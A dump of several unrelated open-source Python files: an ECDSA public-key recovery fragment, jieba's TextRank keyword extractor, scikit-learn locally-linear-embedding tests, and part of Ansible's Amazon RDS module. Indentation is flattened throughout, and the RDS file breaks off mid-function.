r,s = signature
possible_points = set()
#recid = nV - 27
# 1.1
inv_r = numbertheory.inverse_mod(r,order)
minus_e = -value % order
x = r
# 1.3
alpha = ( pow(x,3,p) + curve.a() * x + curve.b() ) % p
beta = numbertheory.modular_sqrt(alpha, p)
for y in [beta, p - beta]:
# 1.4 the constructor checks that nR is at infinity
R = ellipticcurve.Point(curve, x, y, order)
# 1.6 compute Q = r^-1 (sR - eG)
Q = inv_r * ( s * R + minus_e * G )
public_pair = (Q.x(), Q.y())
# check that Q is the public key
if verify(generator, public_pair, value, signature):
# check that we get the original signing address
possible_points.add(public_pair)
return possible_points
| mit |
fbukevin/jieba | jieba/analyse/textrank.py | 57 | 3491 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import sys
from operator import itemgetter
from collections import defaultdict
import jieba.posseg
from .tfidf import KeywordExtractor
from .._compat import *
class UndirectWeightedGraph:
d = 0.85
def __init__(self):
self.graph = defaultdict(list)
def addEdge(self, start, end, weight):
        # use a tuple (start, end, weight) instead of an Edge object
self.graph[start].append((start, end, weight))
self.graph[end].append((end, start, weight))
def rank(self):
ws = defaultdict(float)
outSum = defaultdict(float)
wsdef = 1.0 / (len(self.graph) or 1.0)
for n, out in self.graph.items():
ws[n] = wsdef
outSum[n] = sum((e[2] for e in out), 0.0)
        # sort the keys so iteration order (and hence the result) is stable
sorted_keys = sorted(self.graph.keys())
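        # Weighted PageRank/TextRank update over the undirected graph:
        #   ws(v) = (1 - d) + d * sum over neighbours u of w(u,v)/outSum(u) * ws(u)
        # run below for a fixed number of iterations rather than to convergence.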
for x in xrange(10): # 10 iters
for n in sorted_keys:
s = 0
for e in self.graph[n]:
s += e[2] / outSum[e[1]] * ws[e[1]]
ws[n] = (1 - self.d) + self.d * s
(min_rank, max_rank) = (sys.float_info[0], sys.float_info[3])
for w in itervalues(ws):
if w < min_rank:
min_rank = w
elif w > max_rank:
max_rank = w
for n, w in ws.items():
            # normalize the weights into roughly (0, 1]; deliberately not scaled by 100.
ws[n] = (w - min_rank / 10.0) / (max_rank - min_rank / 10.0)
return ws
class TextRank(KeywordExtractor):
def __init__(self):
self.tokenizer = self.postokenizer = jieba.posseg.dt
self.stop_words = self.STOP_WORDS.copy()
self.pos_filt = frozenset(('ns', 'n', 'vn', 'v'))
self.span = 5
def pairfilter(self, wp):
return (wp.flag in self.pos_filt and len(wp.word.strip()) >= 2
and wp.word.lower() not in self.stop_words)
def textrank(self, sentence, topK=20, withWeight=False, allowPOS=('ns', 'n', 'vn', 'v')):
"""
Extract keywords from sentence using TextRank algorithm.
Parameter:
- topK: return how many top keywords. `None` for all possible words.
- withWeight: if True, return a list of (word, weight);
if False, return a list of words.
- allowPOS: the allowed POS list eg. ['ns', 'n', 'vn', 'v'].
if the POS of w is not in this list, it will be filtered.
"""
self.pos_filt = frozenset(allowPOS)
g = UndirectWeightedGraph()
cm = defaultdict(int)
words = tuple(self.tokenizer.cut(sentence))
for i, wp in enumerate(words):
if self.pairfilter(wp):
for j in xrange(i + 1, i + self.span):
if j >= len(words):
break
if not self.pairfilter(words[j]):
continue
cm[(wp.word, words[j].word)] += 1
for terms, w in cm.items():
g.addEdge(terms[0], terms[1], w)
nodes_rank = g.rank()
if withWeight:
tags = sorted(nodes_rank.items(), key=itemgetter(1), reverse=True)
else:
tags = sorted(nodes_rank, key=nodes_rank.__getitem__, reverse=True)
if topK:
return tags[:topK]
else:
return tags
extract_tags = textrank
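# Hedged usage sketch (not part of the original module): this class backs
# jieba.analyse.textrank(); used directly it would look roughly like
#   tr = TextRank()
#   for word, weight in tr.textrank(some_text, topK=10, withWeight=True):
#       print(word, weight)
# where some_text is any string to extract keywords from.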
| mit |
shusenl/scikit-learn | sklearn/manifold/tests/test_locally_linear.py | 232 | 4761 | from itertools import product
from nose.tools import assert_true
import numpy as np
from numpy.testing import assert_almost_equal, assert_array_almost_equal
from scipy import linalg
from sklearn import neighbors, manifold
from sklearn.manifold.locally_linear import barycenter_kneighbors_graph
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import ignore_warnings
eigen_solvers = ['dense', 'arpack']
#----------------------------------------------------------------------
# Test utility routines
def test_barycenter_kneighbors_graph():
X = np.array([[0, 1], [1.01, 1.], [2, 0]])
A = barycenter_kneighbors_graph(X, 1)
assert_array_almost_equal(
A.toarray(),
[[0., 1., 0.],
[1., 0., 0.],
[0., 1., 0.]])
A = barycenter_kneighbors_graph(X, 2)
# check that columns sum to one
assert_array_almost_equal(np.sum(A.toarray(), 1), np.ones(3))
pred = np.dot(A.toarray(), X)
assert_less(linalg.norm(pred - X) / X.shape[0], 1)
#----------------------------------------------------------------------
# Test LLE by computing the reconstruction error on some manifolds.
def test_lle_simple_grid():
# note: ARPACK is numerically unstable, so this test will fail for
# some random seeds. We choose 2 because the tests pass.
rng = np.random.RandomState(2)
tol = 0.1
# grid of equidistant points in 2D, n_components = n_dim
X = np.array(list(product(range(5), repeat=2)))
X = X + 1e-10 * rng.uniform(size=X.shape)
n_components = 2
clf = manifold.LocallyLinearEmbedding(n_neighbors=5,
n_components=n_components,
random_state=rng)
tol = 0.1
N = barycenter_kneighbors_graph(X, clf.n_neighbors).toarray()
reconstruction_error = linalg.norm(np.dot(N, X) - X, 'fro')
assert_less(reconstruction_error, tol)
for solver in eigen_solvers:
clf.set_params(eigen_solver=solver)
clf.fit(X)
assert_true(clf.embedding_.shape[1] == n_components)
reconstruction_error = linalg.norm(
np.dot(N, clf.embedding_) - clf.embedding_, 'fro') ** 2
assert_less(reconstruction_error, tol)
assert_almost_equal(clf.reconstruction_error_,
reconstruction_error, decimal=1)
# re-embed a noisy version of X using the transform method
noise = rng.randn(*X.shape) / 100
X_reembedded = clf.transform(X + noise)
assert_less(linalg.norm(X_reembedded - clf.embedding_), tol)
def test_lle_manifold():
rng = np.random.RandomState(0)
# similar test on a slightly more complex manifold
X = np.array(list(product(np.arange(18), repeat=2)))
X = np.c_[X, X[:, 0] ** 2 / 18]
X = X + 1e-10 * rng.uniform(size=X.shape)
n_components = 2
for method in ["standard", "hessian", "modified", "ltsa"]:
clf = manifold.LocallyLinearEmbedding(n_neighbors=6,
n_components=n_components,
method=method, random_state=0)
tol = 1.5 if method == "standard" else 3
N = barycenter_kneighbors_graph(X, clf.n_neighbors).toarray()
reconstruction_error = linalg.norm(np.dot(N, X) - X)
assert_less(reconstruction_error, tol)
for solver in eigen_solvers:
clf.set_params(eigen_solver=solver)
clf.fit(X)
assert_true(clf.embedding_.shape[1] == n_components)
reconstruction_error = linalg.norm(
np.dot(N, clf.embedding_) - clf.embedding_, 'fro') ** 2
details = ("solver: %s, method: %s" % (solver, method))
assert_less(reconstruction_error, tol, msg=details)
assert_less(np.abs(clf.reconstruction_error_ -
reconstruction_error),
tol * reconstruction_error, msg=details)
def test_pipeline():
# check that LocallyLinearEmbedding works fine as a Pipeline
# only checks that no error is raised.
# TODO check that it actually does something useful
from sklearn import pipeline, datasets
X, y = datasets.make_blobs(random_state=0)
clf = pipeline.Pipeline(
[('filter', manifold.LocallyLinearEmbedding(random_state=0)),
('clf', neighbors.KNeighborsClassifier())])
clf.fit(X, y)
assert_less(.9, clf.score(X, y))
# Test the error raised when the weight matrix is singular
def test_singular_matrix():
from nose.tools import assert_raises
M = np.ones((10, 3))
f = ignore_warnings
assert_raises(ValueError, f(manifold.locally_linear_embedding),
M, 2, 1, method='standard', eigen_solver='arpack')
| bsd-3-clause |
dataxu/ansible | lib/ansible/modules/cloud/amazon/rds.py | 30 | 55573 | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: rds
version_added: "1.3"
short_description: create, delete, or modify an Amazon rds instance
description:
- Creates, deletes, or modifies rds instances. When creating an instance it can be either a new instance or a read-only replica of an existing
instance. This module has a dependency on python-boto >= 2.5. The 'promote' command requires boto >= 2.18.0. Certain features such as tags rely
on boto.rds2 (boto >= 2.26.0)
options:
command:
description:
- Specifies the action to take. The 'reboot' option is available starting at version 2.0
required: true
choices: [ 'create', 'replicate', 'delete', 'facts', 'modify' , 'promote', 'snapshot', 'reboot', 'restore' ]
instance_name:
description:
- Database instance identifier. Required except when using command=facts or command=delete on just a snapshot
required: false
default: null
source_instance:
description:
- Name of the database to replicate. Used only when command=replicate.
required: false
default: null
db_engine:
description:
- The type of database. Used only when command=create.
- mariadb was added in version 2.2
required: false
default: null
choices: ['mariadb', 'MySQL', 'oracle-se1', 'oracle-se2', 'oracle-se', 'oracle-ee',
'sqlserver-ee', 'sqlserver-se', 'sqlserver-ex', 'sqlserver-web', 'postgres', 'aurora']
size:
description:
- Size in gigabytes of the initial storage for the DB instance. Used only when command=create or command=modify.
required: false
default: null
instance_type:
description:
- The instance type of the database. Must be specified when command=create. Optional when command=replicate, command=modify or command=restore.
If not specified then the replica inherits the same instance type as the source instance.
required: false
default: null
username:
description:
- Master database username. Used only when command=create.
required: false
default: null
password:
description:
- Password for the master database username. Used only when command=create or command=modify.
required: false
default: null
region:
description:
- The AWS region to use. If not specified then the value of the EC2_REGION environment variable, if any, is used.
required: true
aliases: [ 'aws_region', 'ec2_region' ]
db_name:
description:
- Name of a database to create within the instance. If not specified then no database is created. Used only when command=create.
required: false
default: null
engine_version:
description:
- Version number of the database engine to use. Used only when command=create. If not specified then the current Amazon RDS default engine version is used
required: false
default: null
parameter_group:
description:
- Name of the DB parameter group to associate with this instance. If omitted then the RDS default DBParameterGroup will be used. Used only
when command=create or command=modify.
required: false
default: null
license_model:
description:
- The license model for this DB instance. Used only when command=create or command=restore.
required: false
default: null
choices: [ 'license-included', 'bring-your-own-license', 'general-public-license', 'postgresql-license' ]
multi_zone:
description:
- Specifies if this is a Multi-availability-zone deployment. Can not be used in conjunction with zone parameter. Used only when command=create or
command=modify.
choices: [ "yes", "no" ]
required: false
default: null
iops:
description:
- Specifies the number of IOPS for the instance. Used only when command=create or command=modify. Must be an integer greater than 1000.
required: false
default: null
security_groups:
description:
- Comma separated list of one or more security groups. Used only when command=create or command=modify.
required: false
default: null
vpc_security_groups:
description:
- Comma separated list of one or more vpc security group ids. Also requires `subnet` to be specified. Used only when command=create or command=modify.
required: false
default: null
port:
description:
- Port number that the DB instance uses for connections. Used only when command=create or command=replicate.
      - Prior to 2.0 it always defaulted to null and the API would use 3306; it had to be set to the other DB default values when not using MySQL.
Starting at 2.0 it automatically defaults to what is expected for each C(db_engine).
required: false
default: 3306 for mysql, 1521 for Oracle, 1433 for SQL Server, 5432 for PostgreSQL.
upgrade:
description:
- Indicates that minor version upgrades should be applied automatically. Used only when command=create or command=replicate.
required: false
default: no
choices: [ "yes", "no" ]
option_group:
description:
- The name of the option group to use. If not specified then the default option group is used. Used only when command=create.
required: false
default: null
maint_window:
description:
- >
Maintenance window in format of ddd:hh24:mi-ddd:hh24:mi. (Example: Mon:22:00-Mon:23:15) If not specified then a random maintenance window is
assigned. Used only when command=create or command=modify.
required: false
default: null
backup_window:
description:
- Backup window in format of hh24:mi-hh24:mi. If not specified then a random backup window is assigned. Used only when command=create or command=modify.
required: false
default: null
backup_retention:
description:
- >
Number of days backups are retained. Set to 0 to disable backups. Default is 1 day. Valid range: 0-35. Used only when command=create or
command=modify.
required: false
default: null
zone:
description:
- availability zone in which to launch the instance. Used only when command=create, command=replicate or command=restore.
required: false
default: null
aliases: ['aws_zone', 'ec2_zone']
subnet:
description:
- VPC subnet group. If specified then a VPC instance is created. Used only when command=create.
required: false
default: null
snapshot:
description:
- Name of snapshot to take. When command=delete, if no snapshot name is provided then no snapshot is taken. If used with command=delete with
no instance_name, the snapshot is deleted. Used with command=facts, command=delete or command=snapshot.
required: false
default: null
aws_secret_key:
description:
- AWS secret key. If not set then the value of the AWS_SECRET_KEY environment variable is used.
required: false
aliases: [ 'ec2_secret_key', 'secret_key' ]
aws_access_key:
description:
- AWS access key. If not set then the value of the AWS_ACCESS_KEY environment variable is used.
required: false
default: null
aliases: [ 'ec2_access_key', 'access_key' ]
wait:
description:
- When command=create, replicate, modify or restore then wait for the database to enter the 'available' state. When command=delete wait for
the database to be terminated.
required: false
default: "no"
choices: [ "yes", "no" ]
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
apply_immediately:
description:
- Used only when command=modify. If enabled, the modifications will be applied as soon as possible rather than waiting for the next
preferred maintenance window.
default: no
choices: [ "yes", "no" ]
force_failover:
description:
- Used only when command=reboot. If enabled, the reboot is done using a MultiAZ failover.
required: false
default: "no"
choices: [ "yes", "no" ]
version_added: "2.0"
new_instance_name:
description:
- Name to rename an instance to. Used only when command=modify.
required: false
default: null
version_added: "1.5"
character_set_name:
description:
- Associate the DB instance with a specified character set. Used with command=create.
required: false
default: null
version_added: "1.9"
publicly_accessible:
description:
- explicitly set whether the resource should be publicly accessible or not. Used with command=create, command=replicate. Requires boto >= 2.26.0
required: false
default: null
version_added: "1.9"
tags:
description:
- tags dict to apply to a resource. Used with command=create, command=replicate, command=restore. Requires boto >= 2.26.0
required: false
default: null
version_added: "1.9"
requirements:
- "python >= 2.6"
- "boto"
author:
- "Bruce Pennypacker (@bpennypacker)"
- "Will Thames (@willthames)"
extends_documentation_fragment:
- aws
- ec2
'''
# FIXME: the command stuff needs a 'state' like alias to make things consistent -- MPD
EXAMPLES = '''
# Basic mysql provisioning example
- rds:
command: create
instance_name: new-database
db_engine: MySQL
size: 10
instance_type: db.m1.small
username: mysql_admin
password: 1nsecure
tags:
Environment: testing
Application: cms
# Create a read-only replica and wait for it to become available
- rds:
command: replicate
instance_name: new-database-replica
source_instance: new_database
wait: yes
wait_timeout: 600
# Delete an instance, but create a snapshot before doing so
- rds:
command: delete
instance_name: new-database
snapshot: new_database_snapshot
# Get facts about an instance
- rds:
command: facts
instance_name: new-database
register: new_database_facts
# Rename an instance and wait for the change to take effect
- rds:
command: modify
instance_name: new-database
new_instance_name: renamed-database
wait: yes
# Reboot an instance and wait for it to become available again
- rds:
command: reboot
instance_name: database
wait: yes
# Restore a Postgres db instance from a snapshot, wait for it to become available again, and
# then modify it to add your security group. Also, display the new endpoint.
# Note that the "publicly_accessible" option is allowed here just as it is in the AWS CLI
- local_action:
module: rds
command: restore
snapshot: mypostgres-snapshot
instance_name: MyNewInstanceName
region: us-west-2
zone: us-west-2b
subnet: default-vpc-xx441xxx
publicly_accessible: yes
wait: yes
wait_timeout: 600
tags:
Name: pg1_test_name_tag
register: rds
- local_action:
module: rds
command: modify
instance_name: MyNewInstanceName
region: us-west-2
vpc_security_groups: sg-xxx945xx
- debug:
msg: "The new db endpoint is {{ rds.instance.endpoint }}"
'''
RETURN = '''
engine:
description: the name of the database engine
returned: when RDS instance exists
type: string
sample: "oracle-se"
engine_version:
description: the version of the database engine
returned: when RDS instance exists
type: string
sample: "11.2.0.4.v6"
license_model:
description: the license model information
returned: when RDS instance exists
type: string
sample: "bring-your-own-license"
character_set_name:
description: the name of the character set that this instance is associated with
returned: when RDS instance exists
type: string
sample: "AL32UTF8"
allocated_storage:
description: the allocated storage size in gigabytes (GB)
returned: when RDS instance exists
type: string
sample: "100"
publicly_accessible:
description: the accessibility options for the DB instance
returned: when RDS instance exists
type: boolean
sample: "true"
latest_restorable_time:
description: the latest time to which a database can be restored with point-in-time restore
returned: when RDS instance exists
type: string
sample: "1489707802.0"
secondary_avaialbility_zone:
description: the name of the secondary AZ for a DB instance with multi-AZ support
    returned: when RDS instance exists and is multi-AZ
type: string
sample: "eu-west-1b"
backup_window:
description: the daily time range during which automated backups are created if automated backups are enabled
returned: when RDS instance exists and automated backups are enabled
type: string
sample: "03:00-03:30"
auto_minor_version_upgrade:
description: indicates that minor engine upgrades will be applied automatically to the DB instance during the maintenance window
returned: when RDS instance exists
type: boolean
sample: "true"
read_replica_source_dbinstance_identifier:
description: the identifier of the source DB instance if this RDS instance is a read replica
returned: when read replica RDS instance exists
type: string
sample: "null"
db_name:
description: the name of the database to create when the DB instance is created
returned: when RDS instance exists
type: string
sample: "ASERTG"
parameter_groups:
description: the list of DB parameter groups applied to this RDS instance
returned: when RDS instance exists and parameter groups are defined
type: complex
contains:
parameter_apply_status:
description: the status of parameter updates
returned: when RDS instance exists
type: string
sample: "in-sync"
parameter_group_name:
            description: the name of the DB parameter group
returned: when RDS instance exists
type: string
sample: "testawsrpprodb01spfile-1ujg7nrs7sgyz"
option_groups:
description: the list of option group memberships for this RDS instance
returned: when RDS instance exists
type: complex
contains:
option_group_name:
description: the option group name for this RDS instance
returned: when RDS instance exists
type: string
sample: "default:oracle-se-11-2"
status:
description: the status of the RDS instance's option group membership
returned: when RDS instance exists
type: string
sample: "in-sync"
pending_modified_values:
description: a dictionary of changes to the RDS instance that are pending
returned: when RDS instance exists
type: complex
contains:
db_instance_class:
description: the new DB instance class for this RDS instance that will be applied or is in progress
returned: when RDS instance exists
type: string
sample: "null"
db_instance_identifier:
            description: the new DB instance identifier for this RDS instance that will be applied or is in progress
returned: when RDS instance exists
type: string
sample: "null"
allocated_storage:
description: the new allocated storage size for this RDS instance that will be applied or is in progress
returned: when RDS instance exists
type: string
sample: "null"
backup_retention_period:
description: the pending number of days for which automated backups are retained
returned: when RDS instance exists
type: string
sample: "null"
engine_version:
description: indicates the database engine version
returned: when RDS instance exists
type: string
sample: "null"
iops:
description: the new provisioned IOPS value for this RDS instance that will be applied or is being applied
returned: when RDS instance exists
type: string
sample: "null"
master_user_password:
description: the pending or in-progress change of the master credentials for this RDS instance
returned: when RDS instance exists
type: string
sample: "null"
multi_az:
description: indicates that the single-AZ RDS instance is to change to a multi-AZ deployment
returned: when RDS instance exists
type: string
sample: "null"
port:
description: specifies the pending port for this RDS instance
returned: when RDS instance exists
type: string
sample: "null"
db_subnet_groups:
description: information on the subnet group associated with this RDS instance
returned: when RDS instance exists
type: complex
contains:
description:
description: the subnet group associated with the DB instance
returned: when RDS instance exists
type: string
sample: "Subnets for the UAT RDS SQL DB Instance"
name:
description: the name of the DB subnet group
returned: when RDS instance exists
type: string
sample: "samplesubnetgrouprds-j6paiqkxqp4z"
status:
description: the status of the DB subnet group
returned: when RDS instance exists
type: string
sample: "complete"
subnets:
            description: the list of subnets belonging to the DB subnet group
returned: when RDS instance exists
type: complex
contains:
availability_zone:
description: subnet availability zone information
returned: when RDS instance exists
type: complex
contains:
name:
                            description: availability zone
returned: when RDS instance exists
type: string
sample: "eu-west-1b"
provisioned_iops_capable:
description: whether provisioned iops are available in AZ subnet
returned: when RDS instance exists
type: boolean
sample: "false"
identifier:
description: the identifier of the subnet
returned: when RDS instance exists
type: string
sample: "subnet-3fdba63e"
status:
description: the status of the subnet
returned: when RDS instance exists
type: string
sample: "active"
'''
import time
try:
import boto.rds
import boto.exception
except ImportError:
pass # Taken care of by ec2.HAS_BOTO
try:
import boto.rds2
import boto.rds2.exceptions
HAS_RDS2 = True
except ImportError:
HAS_RDS2 = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import AWSRetry
from ansible.module_utils.ec2 import HAS_BOTO, connect_to_aws, ec2_argument_spec, get_aws_connection_info
DEFAULT_PORTS = {
'aurora': 3306,
'mariadb': 3306,
'mysql': 3306,
'oracle': 1521,
'sqlserver': 1433,
'postgres': 5432,
}
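# Engines that carry a flavour suffix (e.g. 'oracle-se1', 'sqlserver-ex') are reduced
# to their base name before this lookup, so 'oracle-se1' defaults to 1521 and
# 'sqlserver-ex' to 1433 (see the port-defaulting logic in main()).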
class RDSException(Exception):
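    """Normalize the different error shapes raised by boto into .message/.code.

    boto.rds raises BotoServerError with error_message/error_code attributes,
    while boto.rds2 errors carry a parsed body with an 'Error' dictionary.
    """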
def __init__(self, exc):
if hasattr(exc, 'error_message') and exc.error_message:
self.message = exc.error_message
self.code = exc.error_code
elif hasattr(exc, 'body') and 'Error' in exc.body:
self.message = exc.body['Error']['Message']
self.code = exc.body['Error']['Code']
else:
self.message = str(exc)
self.code = 'Unknown Error'
class RDSConnection:
def __init__(self, module, region, **aws_connect_params):
try:
self.connection = connect_to_aws(boto.rds, region, **aws_connect_params)
except boto.exception.BotoServerError as e:
module.fail_json(msg=e.error_message)
def get_db_instance(self, instancename):
try:
return RDSDBInstance(self.connection.get_all_dbinstances(instancename)[0])
except boto.exception.BotoServerError:
return None
def get_db_snapshot(self, snapshotid):
try:
return RDSSnapshot(self.connection.get_all_dbsnapshots(snapshot_id=snapshotid)[0])
except boto.exception.BotoServerError:
return None
def create_db_instance(self, instance_name, size, instance_class, db_engine,
username, password, **params):
params['engine'] = db_engine
try:
result = self.connection.create_dbinstance(instance_name, size, instance_class,
username, password, **params)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def create_db_instance_read_replica(self, instance_name, source_instance, **params):
try:
            result = self.connection.create_dbinstance_read_replica(instance_name, source_instance, **params)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def delete_db_instance(self, instance_name, **params):
try:
result = self.connection.delete_dbinstance(instance_name, **params)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def delete_db_snapshot(self, snapshot):
try:
result = self.connection.delete_dbsnapshot(snapshot)
return RDSSnapshot(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def modify_db_instance(self, instance_name, **params):
try:
result = self.connection.modify_dbinstance(instance_name, **params)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def reboot_db_instance(self, instance_name, **params):
try:
result = self.connection.reboot_dbinstance(instance_name)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def restore_db_instance_from_db_snapshot(self, instance_name, snapshot, instance_type, **params):
try:
result = self.connection.restore_dbinstance_from_dbsnapshot(snapshot, instance_name, instance_type, **params)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def create_db_snapshot(self, snapshot, instance_name, **params):
try:
result = self.connection.create_dbsnapshot(snapshot, instance_name)
return RDSSnapshot(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def promote_read_replica(self, instance_name, **params):
try:
result = self.connection.promote_read_replica(instance_name, **params)
return RDSDBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
class RDS2Connection:
def __init__(self, module, region, **aws_connect_params):
try:
self.connection = connect_to_aws(boto.rds2, region, **aws_connect_params)
except boto.exception.BotoServerError as e:
module.fail_json(msg=e.error_message)
def get_db_instance(self, instancename):
try:
dbinstances = self.connection.describe_db_instances(
db_instance_identifier=instancename
)['DescribeDBInstancesResponse']['DescribeDBInstancesResult']['DBInstances']
result = RDS2DBInstance(dbinstances[0])
return result
except boto.rds2.exceptions.DBInstanceNotFound as e:
return None
except Exception as e:
raise e
def get_db_snapshot(self, snapshotid):
try:
snapshots = self.connection.describe_db_snapshots(
db_snapshot_identifier=snapshotid,
snapshot_type='manual'
)['DescribeDBSnapshotsResponse']['DescribeDBSnapshotsResult']['DBSnapshots']
result = RDS2Snapshot(snapshots[0])
return result
except boto.rds2.exceptions.DBSnapshotNotFound:
return None
def create_db_instance(self, instance_name, size, instance_class, db_engine,
username, password, **params):
try:
result = self.connection.create_db_instance(instance_name, size, instance_class, db_engine, username, password,
**params)['CreateDBInstanceResponse']['CreateDBInstanceResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def create_db_instance_read_replica(self, instance_name, source_instance, **params):
try:
result = self.connection.create_db_instance_read_replica(
instance_name,
source_instance,
**params
)['CreateDBInstanceReadReplicaResponse']['CreateDBInstanceReadReplicaResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def delete_db_instance(self, instance_name, **params):
try:
result = self.connection.delete_db_instance(instance_name, **params)['DeleteDBInstanceResponse']['DeleteDBInstanceResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def delete_db_snapshot(self, snapshot):
try:
result = self.connection.delete_db_snapshot(snapshot)['DeleteDBSnapshotResponse']['DeleteDBSnapshotResult']['DBSnapshot']
return RDS2Snapshot(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def modify_db_instance(self, instance_name, **params):
try:
result = self.connection.modify_db_instance(instance_name, **params)['ModifyDBInstanceResponse']['ModifyDBInstanceResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def reboot_db_instance(self, instance_name, **params):
try:
result = self.connection.reboot_db_instance(instance_name, **params)['RebootDBInstanceResponse']['RebootDBInstanceResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def restore_db_instance_from_db_snapshot(self, instance_name, snapshot, instance_type, **params):
try:
result = self.connection.restore_db_instance_from_db_snapshot(
instance_name,
snapshot,
**params
)['RestoreDBInstanceFromDBSnapshotResponse']['RestoreDBInstanceFromDBSnapshotResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def create_db_snapshot(self, snapshot, instance_name, **params):
try:
result = self.connection.create_db_snapshot(snapshot, instance_name, **params)['CreateDBSnapshotResponse']['CreateDBSnapshotResult']['DBSnapshot']
return RDS2Snapshot(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
def promote_read_replica(self, instance_name, **params):
try:
result = self.connection.promote_read_replica(instance_name, **params)['PromoteReadReplicaResponse']['PromoteReadReplicaResult']['DBInstance']
return RDS2DBInstance(result)
except boto.exception.BotoServerError as e:
raise RDSException(e)
class RDSDBInstance:
def __init__(self, dbinstance):
self.instance = dbinstance
self.name = dbinstance.id
self.status = dbinstance.status
def get_data(self):
d = {
'id': self.name,
'create_time': self.instance.create_time,
'status': self.status,
'availability_zone': self.instance.availability_zone,
'backup_retention': self.instance.backup_retention_period,
'backup_window': self.instance.preferred_backup_window,
'maintenance_window': self.instance.preferred_maintenance_window,
'multi_zone': self.instance.multi_az,
'instance_type': self.instance.instance_class,
'username': self.instance.master_username,
'iops': self.instance.iops
}
# Only assign an Endpoint if one is available
if hasattr(self.instance, 'endpoint'):
d["endpoint"] = self.instance.endpoint[0]
d["port"] = self.instance.endpoint[1]
if self.instance.vpc_security_groups is not None:
d["vpc_security_groups"] = ','.join(x.vpc_group for x in self.instance.vpc_security_groups)
else:
d["vpc_security_groups"] = None
else:
d["endpoint"] = None
d["port"] = None
d["vpc_security_groups"] = None
if self.instance.DBName:
d['DBName'] = self.instance.DBName
# ReadReplicaSourceDBInstanceIdentifier may or may not exist
try:
d["replication_source"] = self.instance.ReadReplicaSourceDBInstanceIdentifier
except Exception:
d["replication_source"] = None
return d
class RDS2DBInstance:
def __init__(self, dbinstance):
self.instance = dbinstance
if 'DBInstanceIdentifier' not in dbinstance:
self.name = None
else:
self.name = self.instance.get('DBInstanceIdentifier')
self.status = self.instance.get('DBInstanceStatus')
def get_data(self):
d = {
'id': self.name,
'create_time': self.instance['InstanceCreateTime'],
'engine': self.instance['Engine'],
'engine_version': self.instance['EngineVersion'],
'license_model': self.instance['LicenseModel'],
'character_set_name': self.instance['CharacterSetName'],
'allocated_storage': self.instance['AllocatedStorage'],
'publicly_accessible': self.instance['PubliclyAccessible'],
'latest_restorable_time': self.instance['LatestRestorableTime'],
'status': self.status,
'availability_zone': self.instance['AvailabilityZone'],
'secondary_avaialbility_zone': self.instance['SecondaryAvailabilityZone'],
'backup_retention': self.instance['BackupRetentionPeriod'],
'backup_window': self.instance['PreferredBackupWindow'],
'maintenance_window': self.instance['PreferredMaintenanceWindow'],
'auto_minor_version_upgrade': self.instance['AutoMinorVersionUpgrade'],
'read_replica_source_dbinstance_identifier': self.instance['ReadReplicaSourceDBInstanceIdentifier'],
'multi_zone': self.instance['MultiAZ'],
'instance_type': self.instance['DBInstanceClass'],
'username': self.instance['MasterUsername'],
'db_name': self.instance['DBName'],
'iops': self.instance['Iops'],
'replication_source': self.instance['ReadReplicaSourceDBInstanceIdentifier']
}
if self.instance['DBParameterGroups'] is not None:
parameter_groups = []
for x in self.instance['DBParameterGroups']:
parameter_groups.append({'parameter_group_name': x['DBParameterGroupName'], 'parameter_apply_status': x['ParameterApplyStatus']})
d['parameter_groups'] = parameter_groups
if self.instance['OptionGroupMemberships'] is not None:
option_groups = []
for x in self.instance['OptionGroupMemberships']:
option_groups.append({'status': x['Status'], 'option_group_name': x['OptionGroupName']})
d['option_groups'] = option_groups
if self.instance['PendingModifiedValues'] is not None:
pdv = self.instance['PendingModifiedValues']
d['pending_modified_values'] = {
'multi_az': pdv['MultiAZ'],
'master_user_password': pdv['MasterUserPassword'],
'port': pdv['Port'],
'iops': pdv['Iops'],
'allocated_storage': pdv['AllocatedStorage'],
'engine_version': pdv['EngineVersion'],
'backup_retention_period': pdv['BackupRetentionPeriod'],
'db_instance_class': pdv['DBInstanceClass'],
'db_instance_identifier': pdv['DBInstanceIdentifier']
}
if self.instance["DBSubnetGroup"] is not None:
dsg = self.instance["DBSubnetGroup"]
db_subnet_groups = {}
db_subnet_groups['vpc_id'] = dsg['VpcId']
db_subnet_groups['name'] = dsg['DBSubnetGroupName']
db_subnet_groups['status'] = dsg['SubnetGroupStatus'].lower()
db_subnet_groups['description'] = dsg['DBSubnetGroupDescription']
db_subnet_groups['subnets'] = []
for x in dsg["Subnets"]:
db_subnet_groups['subnets'].append({
'status': x['SubnetStatus'].lower(),
'identifier': x['SubnetIdentifier'],
'availability_zone': {
'name': x['SubnetAvailabilityZone']['Name'],
'provisioned_iops_capable': x['SubnetAvailabilityZone']['ProvisionedIopsCapable']
}
})
